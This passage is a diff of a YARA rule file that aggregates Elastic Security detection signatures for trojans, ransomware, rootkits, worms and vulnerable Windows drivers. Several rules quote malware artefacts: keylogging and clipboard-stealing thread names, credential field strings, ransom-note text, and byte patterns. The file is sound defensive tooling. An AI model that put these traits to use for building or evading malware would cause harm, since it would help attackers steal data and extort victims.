"07b8f25e7b536f5b6f686c12d04edc37e11347c8acd5c53f98a174723078c365" - logic_hash = "efefc171b6390c9792145973708358f62b18b8d0180feacaf5b9267563c3f7cc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Lumma.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "88340abcdc3cfe7574ee044aea44808446daf3bb7bf9fc60b16a2b1360c5d9c0" + logic_hash = "2b29ac9bc73f191bdbfc92601cab923aa9f2f3380c8123ee469ced3754625dd0" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "eb39d2ff211230aedcf1b5ec0d1dfea108473cc7cba68f5dc1a88479734c02b0" - severity = 100 + fingerprint = "9e51b8833b6fffe740f3c9f87a874dbf4d668d68307393b20cf9e4e69e899d3f" + severity = 50 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 24 08 8B 44 24 08 83 C4 14 5D 5F 5E 5B C3 55 8B EC 83 C4 F0 } + $a1 = { 02 0F B7 16 83 C6 02 66 85 D2 75 EF 66 C7 00 00 00 0F B7 11 } + $a2 = { 0C 0F B7 4C 24 04 66 89 0F 83 C7 02 39 F7 73 0C 01 C3 39 EB } condition: all of them } -rule ELASTIC_Windows_Trojan_Cybergate_C219A2F3 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Octopus_15813E26 : FILE MEMORY { meta: - description = "Detects Windows Trojan Cybergate (Windows.Trojan.CyberGate)" + description = "Identifies Octopus, an Open source pre-operation C2 server based on Python and PowerShell" author = "Elastic Security" - id = "c219a2f3-5ae2-4cdf-97d7-2778954ee826" - date = "2023-05-04" - modified = "2023-06-13" + id = "15813e26-77f8-46cf-a6a3-ae081925b85a" + date = "2021-11-10" + modified = "2022-01-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_CyberGate.yar#L45-L64" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b7204f8caf6ace6ae1aed267de0ad6b39660d0e636d8ee0ecf88135f8a58dc42" - logic_hash = "8075892728c610c1ceacd0df54615d2a3e833d728d631a9bf81311e8c6485f6e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Octopus.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "0d30b96ead4ccba75e08f6ba1db73cee61a29b5b0c7ee0fb523cbcd61dce9d87" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8a79d1eba89dd08d2e8bdedee834c88dbeabf5f2f249b1e5accdb827671c22c2" + fingerprint = "a3294547f7e3cead0cd64eb3d2e7dbd8ccfc4d9eedede240a643c8cd114cbcce" + threat_name = "Windows.Trojan.Octopus" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -69260,90 +69584,86 @@ rule ELASTIC_Windows_Trojan_Cybergate_C219A2F3 : FILE MEMORY os = "windows" strings: - $a1 = { 00 00 55 8B EC 83 C4 EC 56 57 8B 45 08 8B F0 8D 7D EC A5 A5 } - $a2 = { 49 80 39 C3 75 F5 8B C2 C3 55 8B EC 6A 00 6A 00 6A 00 53 56 57 } + $a = "C:\\Users\\UNKNOWN\\source\\repos\\OctopusUnmanagedExe\\OctopusUnmanagedExe\\obj\\x64\\Release\\SystemConfiguration.pdb" ascii fullword condition: all of them } -rule ELASTIC_Windows_Trojan_Hazelcobra_6A9Fe48A : FILE MEMORY +rule ELASTIC_Windows_Trojan_Caesarkbd_32Bb198B : FILE { meta: - description = "Detects Windows Trojan Hazelcobra (Windows.Trojan.HazelCobra)" + description = "Detects Windows Trojan Caesarkbd (Windows.Trojan.CaesarKbd)" author = "Elastic Security" - id = "6a9fe48a-6fd9-4bce-ac43-254c02d6b3a4" - date = "2023-11-01" - modified = "2023-11-01" + id = "32bb198b-ec03-4628-8e9b-bc36c2525ec7" + date = "2022-04-04" + modified = "2022-06-09" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_HazelCobra.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d" - logic_hash = "dc4d561497c2e3da270d305ceaf3194b48d64c0d8e212ee6f03a2d89c8e006e8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_CaesarKbd.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d4335f4189240a3bcafa05fab01f0707cc8e3dd7a2998af734c24916d9e37ca8" + logic_hash = "f708706524515f98ebf612ac98318ee7172347096251d9ccd723f439070521de" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "4dc883be5fb6aae0dac0ec5d64baf24f0f3aaded6d759ec7dccb1a2ae641ae7b" + tags = "FILE" + fingerprint = "54ed92761bb619ae4dcec9c27127d6c2a74a575916249cd5db24b8deb2ee0588" severity = 100 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a1 = { 83 E9 37 48 63 C2 F6 C2 01 75 0C C0 E1 04 48 D1 F8 88 4C 04 40 EB 07 } - $s1 = "Data file loaded. Running..." fullword - $s2 = "No key in args" fullword - $s3 = "Can't read data file" fullword + $str1 = "CaesarKbd_IOCtrl" condition: - $a1 or all of ($s*) + int16 ( uint32(0x3C)+0x5c)==0x0001 and $str1 } -rule ELASTIC_Macos_Virus_Pirrit_271B8Ed0 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Psybnc_563Ecb11 : FILE MEMORY { meta: - description = "Detects Macos Virus Pirrit (MacOS.Virus.Pirrit)" + description = "Detects Linux Trojan Psybnc (Linux.Trojan.Psybnc)" author = "Elastic Security" - id = "271b8ed0-937a-4be6-aecb-62535b5aeda7" - date = "2021-10-05" - modified = "2021-10-25" + id = "563ecb11-e215-411f-8583-7cb7b2956252" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Virus_Pirrit.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7feda05d41b09c06a08c167c7f4dde597ac775c54bf0d74a82aa533644035177" - logic_hash = "cb77f6df1403afbc7f45d30551559b6de7eb1c3434778b46d31754da0a1b1f10" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Psybnc.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f77216b169e8d12f22ef84e625159f3a51346c2b6777a1fcfb71268d17b06d39" + logic_hash = "b93e6ab097ccd4c348d228a48df098594e560e62256bfe019669ca9488221214" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "12b09b2e3a43905db2cfe96d0fd0e735cfc7784ee7b03586c5d437d7c6a1b422" + fingerprint = "1e7a2a6240d6f7396505cc2203c03d4ae93a7ef0c0c956cef7a390b4303a2cbe" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a = { 35 4A 6A 00 00 32 80 35 44 6A 00 00 75 80 35 3E 6A 00 00 1F 80 35 38 6A 00 00 } + $a = { 5F 65 6E 00 6B 6F 5F 65 6E 00 72 75 5F 65 6E 00 65 73 5F 65 6E 00 44 } condition: all of them } -rule ELASTIC_Linux_Trojan_Sshdkit_18A0B82A : FILE MEMORY +rule ELASTIC_Linux_Trojan_Psybnc_Ab3396D5 : FILE MEMORY { meta: - description = "Detects Linux Trojan Sshdkit (Linux.Trojan.Sshdkit)" + description = "Detects Linux Trojan Psybnc (Linux.Trojan.Psybnc)" author = "Elastic Security" - id = "18a0b82a-94ff-4328-bfa7-25034f170522" - date = "2021-04-06" + id = "ab3396d5-388b-4730-9a55-581c327a2769" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Sshdkit.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "003245047359e17706e4504f8988905a219fcb48865afea934e6aafa7f97cef6" - logic_hash = "4b7a78ebf3c114809148cc9855379b2e63c959966272ad45759838d570b42016" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Psybnc.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "c5ec84e7cc891af25d6319abb07b1cedd90b04cbb6c8656c60bcb07e60f0b620" + logic_hash = "8c083f66fc252a88395bb954a67d710d64f5b68efb9df4b60b260302874b400a" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9bd28a490607b75848611389b39cf77229cfdd1e885f23c5439d49773924ce16" + fingerprint = "1180e02d3516466457f48dc614611a6949a4bf21f6a294f6384892db30dc4171" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -69351,150 +69671,155 @@ rule ELASTIC_Linux_Trojan_Sshdkit_18A0B82A : FILE MEMORY os = "linux" strings: - $a = { 06 2A CA 37 F2 31 18 0E 2F 47 CD 87 9D 16 3F 6D } + $a = { 53 54 00 55 53 45 52 4F 4E 00 30 00 50 25 64 00 58 30 31 00 } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Fiddrv_E7875A5A : FILE +rule ELASTIC_Linux_Trojan_Psybnc_F07357F1 : FILE MEMORY { meta: - description = "Detects Intel's R/W MSR driver (fiddrv64.sys)" + description = "Detects Linux Trojan Psybnc (Linux.Trojan.Psybnc)" author = "Elastic Security" - id = "e7875a5a-5a88-4bc3-9cfc-91b446dcc6aa" - date = "2023-07-25" - modified = "2023-07-25" + id = "f07357f1-1a92-4bd7-a43d-7a75fb90ac83" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Vulndriver_FidDrv.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4bf4cced4209c73aa37a9e2bf9ff27d458d8d7201eefa6f6ad4849ee276ad158" - logic_hash = "aa1635c651c8364ad2ee93b369dd583fce699001d753e46de013c476d185eef1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Psybnc.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f77216b169e8d12f22ef84e625159f3a51346c2b6777a1fcfb71268d17b06d39" + logic_hash = "cfe217fe108de787600d1ef06ac6738d84aedfc46e5632143692a9f83cb62df7" score = 75 quality = 75 - tags = "FILE" - fingerprint = "ed9ef63a9e2434a30f22f679edb99b9104eb4397968d84599c7828102312025e" - threat_name = "Windows.VulnDriver.FidDrv" - severity = 50 + tags = "FILE, MEMORY" + fingerprint = "f0f1008fec444ce25d80f9878a04d9ebe9a76f792f4be8747292ee7b133ea05c" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $subject = { 06 03 55 04 03 [2] 49 6E 74 65 6C 28 52 29 20 50 72 6F 63 65 73 73 6F 72 20 49 64 65 6E 74 69 66 69 63 61 74 69 6F 6E 20 55 74 69 6C 69 74 79 } - $read_msr = { 53 55 57 56 52 41 50 0F 32 41 58 41 89 10 5A 89 02 B8 01 00 00 00 5E 5F 5D 5B C3 } - $write_msr = { 53 55 57 56 48 8B C2 49 8B D0 0F 30 B8 01 00 00 00 5E 5F 5D 5B C3 } - $ioctl_check = { 48 8B 82 B8 00 00 00 8B 48 18 81 E9 84 2A 22 00 0F 84 ?? ?? ?? ?? 83 E9 04 } + $a = { F7 EA 89 D0 C1 F8 02 89 CF C1 FF 1F 29 F8 8D 04 80 01 C0 29 C1 8D } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and all of them + all of them } -rule ELASTIC_Windows_Vulndriver_Marvinhw_37326842 : FILE +rule ELASTIC_Windows_Trojan_Diceloader_B32C6B99 : FILE MEMORY { meta: - description = "Subject: Marvin Test Solutions, Inc., Name: HW.sys, Version: 4.9.8.0" + description = "Detects Windows Trojan Diceloader (Windows.Trojan.Diceloader)" author = "Elastic Security" - id = "37326842-66a3-4058-abb7-d6d48ca58831" - date = "2022-07-21" - modified = "2022-07-21" + id = "b32c6b99-f634-4c6f-98f4-39954ef15afa" + date = "2021-04-23" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_MarvinHW.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5" - logic_hash = "f37290912ab7d997d718c074eef48a67a36444e9e97592b6be65855ade2ba246" - score = 50 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Diceloader.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a3b3f56a61c6dc8ba2aa25bdd9bd7dc2c5a4602c2670431c5cbc59a76e2b4c54" + logic_hash = "f9e023f340edc4c46b2926e750c2ad3a3798e34415e43c0ea2d83073e3dc526a" + score = 75 quality = 75 - tags = "FILE" - fingerprint = "f0ac8176d412dfaeb9c37ce18c13dea7cc2783fd37421b69e19c4dfa898e42be" - threat_name = "Windows.VulnDriver.MarvinHW" + tags = "FILE, MEMORY" + fingerprint = "15d4bc57c03a560608ae69551aa46d1786072b3d78d747512f8ac3e6822a7b93" severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $subject_name = { 06 03 55 04 03 [2] 4D 61 72 76 69 6E 20 54 65 73 74 20 53 6F 6C 75 74 69 6F 6E 73 2C 20 49 6E 63 2E } - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 48 00 57 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x09][\x00-\x00])([\x00-\x04][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x08][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x03][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x08][\x00-\x00])([\x00-\x04][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x09][\x00-\x00])([\x00-\x04][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x07][\x00-\x00]))/ + $a1 = "D$0GET " ascii fullword + $a2 = "D$THostf" ascii fullword + $a3 = "D$,POST" ascii fullword + $a4 = "namef" ascii fullword + $a5 = "send" ascii fullword + $a6 = "log.ini" wide + $a7 = { 70 61 73 73 00 00 65 6D 61 69 6C 00 00 6C 6F 67 69 6E 00 00 73 69 67 6E 69 6E 00 00 61 63 63 6F 75 6E 74 00 00 70 65 72 73 69 73 74 65 6E 74 00 00 48 6F 73 74 3A 20 } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and int16 ( uint32(0x3C)+0x18)==0x020b and $subject_name and $original_file_name and $version + all of them } -rule ELASTIC_Linux_Cryptominer_Xpaj_Fdbd614E : FILE MEMORY +rule ELASTIC_Windows_Trojan_Diceloader_15Eeb7B9 : FILE MEMORY { meta: - description = "Detects Linux Cryptominer Xpaj (Linux.Cryptominer.Xpaj)" + description = "Detects Windows Trojan Diceloader (Windows.Trojan.Diceloader)" author = "Elastic Security" - id = "fdbd614e-e628-43ff-86d4-1057f9d544ac" - date = "2021-01-12" - modified = "2021-09-16" + id = "15eeb7b9-311f-477b-8ae1-b8f689a154b7" + date = "2021-04-23" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Cryptominer_Xpaj.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3e2b1b36981713217301dd02db33fb01458b3ff47f28dfdc795d8d1d332f13ea" - logic_hash = "70e6450f98411750361481aaad0d3ea079f58b1ae09970f04da09c20137a50fa" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Diceloader.yar#L27-L46" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746" + logic_hash = "f1ab9ad69f9ea75343c7404b82a3f7a4976a442b980a98fe5b95c55d4f9cb34e" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "456b69d4035aa2d682ba081c2f7b24c696f655ec164645f83c9aef5bd262f510" + fingerprint = "4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 72 72 6F 72 3A 20 47 65 74 25 73 20 74 65 6D 70 20 72 65 74 75 } + $a1 = { E9 92 9D FF FF C3 E8 } + $a2 = { E9 E8 61 FF FF C3 E8 } condition: - all of them + any of them } -rule ELASTIC_Multi_Attacksimulation_Blindspot_D93F54C5 : FILE MEMORY +rule ELASTIC_Linux_Ransomware_Esxiargs_75A8Ec04 : FILE MEMORY { meta: - description = "Detects Multi Attacksimulation Blindspot (Multi.AttackSimulation.Blindspot)" + description = "Detects Linux Ransomware Esxiargs (Linux.Ransomware.Esxiargs)" author = "Elastic Security" - id = "d93f54c5-6574-4999-a3c0-39ef688b28dc" - date = "2022-05-23" - modified = "2022-08-16" + id = "75a8ec04-c41d-4702-94fa-976870762aaf" + date = "2023-02-09" + modified = "2024-02-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Multi_AttackSimulation_Blindspot.yar#L1-L18" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "41984a0ad20ab21186252bb2f3f68604d2cbeea0e1ce22895dd163f7acbf2ca1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Ransomware_Esxiargs.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "11b1b2375d9d840912cfd1f0d0d04d93ed0cddb0ae4ddb550a5b62cd044d6b66" + logic_hash = "7316cab75c1bcf41ae6c96afa41ef96c37ab1bb679f36a0cc1dd08002a357165" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4ec38f841aa4dfe32b1f6b6cd2e361c7298839ef1e983061cb90827135f34a58" - severity = 1 - arch_context = "x86, arm64" + fingerprint = "279259c7ca41331b09842c2221139d249d6dfe2e2cb6b27eb50af7be75120ce4" + severity = 100 + arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "multi" + os = "linux" strings: - $a = "\\\\.\\pipe\\blindspot-%d." + $s1 = "number of MB in encryption block" + $s2 = "number of MB to skip while encryption" + $s3 = "get_pk_data: key file is empty" + $s4 = { 6F 70 65 6E 00 6C 73 65 65 6B 20 5B 65 6E 64 5D 00 6F 70 65 6E 5F 70 6B 5F 66 69 6C 65 } + $s5 = "[] [] []" condition: - all of them + 3 of them } -rule ELASTIC_Linux_Rootkit_Dakkatoni_010D3Ac2 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ganiw_99349371 : FILE MEMORY { meta: - description = "Detects Linux Rootkit Dakkatoni (Linux.Rootkit.Dakkatoni)" + description = "Detects Linux Trojan Ganiw (Linux.Trojan.Ganiw)" author = "Elastic Security" - id = "010d3ac2-0bb2-4966-bf5f-fd040ba07311" + id = "99349371-644e-4954-9b7d-f2f579922565" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Rootkit_Dakkatoni.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "38b2d033eb5ce87faa4faa7fcac943d9373e432e0d45e741a0c01d714ee9d4d3" - logic_hash = "51119321f29aed695e09da22d3234eae96db93e8029d4525d018e56c7131f7b8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ganiw.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e8dbb246fdd1a50226a36c407ac90eb44b0cf5e92bf0b92c89218f474f9c2afb" + logic_hash = "26160e855c63fc0b73e415de2fe058f2005df1ec5544d21865d022c5474df30c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "2c7935079dc971d2b8a64c512ad677e946ff45f7f1d1b62c3ca011ebde82f13b" + fingerprint = "6b0cbea419915567c2ecd84bfcb2c7f7301435ee953f16c6dcba826802637551" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -69502,28 +69827,27 @@ rule ELASTIC_Linux_Rootkit_Dakkatoni_010D3Ac2 : FILE MEMORY os = "linux" strings: - $a = { 89 C8 C1 E0 0D 31 C1 89 CE 83 E6 03 83 C6 05 89 C8 31 D2 C1 } + $a = { 10 66 89 43 02 8B 5D FC C9 C3 55 89 E5 53 83 EC 04 8B 45 14 8B } condition: all of them } -rule ELASTIC_Linux_Ransomware_Erebus_Ead4F55B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ganiw_B9F045Aa : FILE MEMORY { meta: - description = "Detects Linux Ransomware Erebus (Linux.Ransomware.Erebus)" + description = "Detects Linux Trojan Ganiw (Linux.Trojan.Ganiw)" author = "Elastic Security" - id = "ead4f55b-a4c6-46ff-bc8e-03831a17df9c" - date = "2023-07-27" - modified = "2024-02-13" + id = "b9f045aa-99fa-47e9-b179-ac62158b3fe2" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_Erebus.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6558330f07a7c90c40006346ed09e859b588d031193f8a9679fe11a85c8ccb37" - logic_hash = "82e81577372298623ee3ed3583bb18b2c0cfff30abbacf2909e7efca35c83bd7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ganiw.yar#L21-L38" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "2565101b261bee22ddecf6898ff0ac8a114d09c822d8db26ba3e3571ebe06b12" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "571832cc76322a95244b042ab9b358755a1be19260410658dc32c03c5cae7638" + fingerprint = "0aaec92ca1c622df848bba80a2f1e4646252625d58e28269965b13d65158f238" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -69531,161 +69855,144 @@ rule ELASTIC_Linux_Ransomware_Erebus_Ead4F55B : FILE MEMORY os = "linux" strings: - $a1 = "important files have been encrypted" - $a2 = "max_size_mb" - $a3 = "EREBUS IS BEST." + $a = { E5 57 8B 55 0C 85 D2 74 21 FC 31 C0 8B 7D 08 AB AB AB AB AB AB } condition: - 2 of them + all of them } -rule ELASTIC_Macos_Trojan_Eggshell_Ddacf7B9 : FILE MEMORY +rule ELASTIC_Linux_Worm_Generic_920D273F : FILE MEMORY { meta: - description = "Detects Macos Trojan Eggshell (MacOS.Trojan.Eggshell)" + description = "Detects Linux Worm Generic (Linux.Worm.Generic)" author = "Elastic Security" - id = "ddacf7b9-8479-47ef-9df2-17060578a8e5" - date = "2021-09-30" - modified = "2021-10-25" + id = "920d273f-5b2b-4eec-a2b3-8d411f2ea181" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Trojan_Eggshell.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6d93a714dd008746569c0fbd00fadccbd5f15eef06b200a4e831df0dc8f3d05b" - logic_hash = "f986f7d1e3a68e27f82048017c6d6381a0354ffad2cd10f3eee69bbbfa940abd" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Worm_Generic.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "04a65bc73fab91f654d448b2d7f8f15ac782965dcdeec586e20b5c7a8cc42d73" + logic_hash = "d0ed260857ae3002483ea7ef242b82514caaa95c2700b39dd0a03d39fdde090d" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "2e6284c8e44809d5f88781dcf7779d1e24ce3aedd5e8db8598e49c01da63fe62" + fingerprint = "3d4dd13b715249710bc2a02b1628fb68bcccebab876ff6674cad713e93ac53d2" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "macos" + os = "linux" strings: - $a1 = "ScreenshotThread" ascii fullword - $a2 = "KeylogThread" ascii fullword - $a3 = "GetClipboardThread" ascii fullword - $a4 = "_uploadProgress" ascii fullword - $a5 = "killTask:" ascii fullword + $a = { E9 E5 49 86 49 A4 1A 70 C7 A4 AD 2E E9 D9 09 F5 AD CB ED FC 3B } condition: all of them } -rule ELASTIC_Windows_Vulndriver_Mtcbsv_7F6D642E : FILE +rule ELASTIC_Linux_Worm_Generic_98Efcd38 : FILE MEMORY { meta: - description = "Name: mtcBSv64.sys, Version: 21.2.0.0" + description = "Detects Linux Worm Generic (Linux.Worm.Generic)" author = "Elastic Security" - id = "7f6d642e-bf8c-44e7-939f-08513523ee2e" - date = "2022-04-07" - modified = "2022-04-07" + id = "98efcd38-d579-46f7-a8f8-360f799a5078" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_VulnDriver_MtcBsv.yar#L1-L21" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c" - logic_hash = "dfd53a2b97ad722307561fc5f109dcba372bf600113786bb351ed1262fdc8556" - score = 75 - quality = 75 - tags = "FILE" - fingerprint = "f59ad8d5f19584e76e67689aba1e0d305d451ed6a030c6e2bccd048e0aeb0b0a" - threat_name = 